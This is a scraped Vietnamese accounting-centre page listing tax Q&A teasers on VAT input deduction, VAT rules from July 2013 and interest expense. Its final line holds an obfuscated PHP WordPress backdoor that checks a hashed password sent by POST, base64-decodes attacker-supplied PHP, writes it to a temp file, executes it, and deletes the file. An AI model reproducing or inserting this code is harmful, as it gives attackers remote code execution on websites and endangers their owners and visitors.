1
Hỏi – Đáp Thuế

Các tình huống về thuế gtgt liên quan tới khấu trừ thuế gtgt đầu vào (01/01/2014)

Trung tâm kế toán Hà Nội xin chia sẻ với các bạn một số tình huống về thuế GTGT như sau Câu hỏi 1: Trong trường hợp nào tài sản cố định, máy móc, thiết bị không được khấu trừ

Xem thêm

Giải đáp các tình huống về thuế giá trị gia tăng áp dụng từ ngày 01/07/2013

Trung tâm kế toán Hà Nội xin chia sẻ một vài tình huống thuế giá trị gia tăng giúp các bạn kế toán nắm bắt kịp thời các quy định mới về chính sách thuế, quy định mới về Thuế GTGT hơn

Xem thêm

Tình huống thuế giá trị gia tăng áp dụng từ ngày 01/07/2013

Trung tâm kế toán Hà Nội xin chia sẻ một vài tình huống thuế giá trị gia tăng mới được áp dụng từ ngày 01/07/2013 để kế toán có thể cập nhật và xử lý tốt nhất các nghiệp vụ kế

Xem thêm

Tình huống kế toán liên quan đến chi phí lãi vay

Trong những khoản mục nằm trong nợ phải trả của doanh nghiệp thì có những khoản doanh nghiệp sẽ phải trả phí khi sử dụng, đó là chi phí lãi vay. Khoản lãi này cũng được xếp vào nợ phải

Xem thêm
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}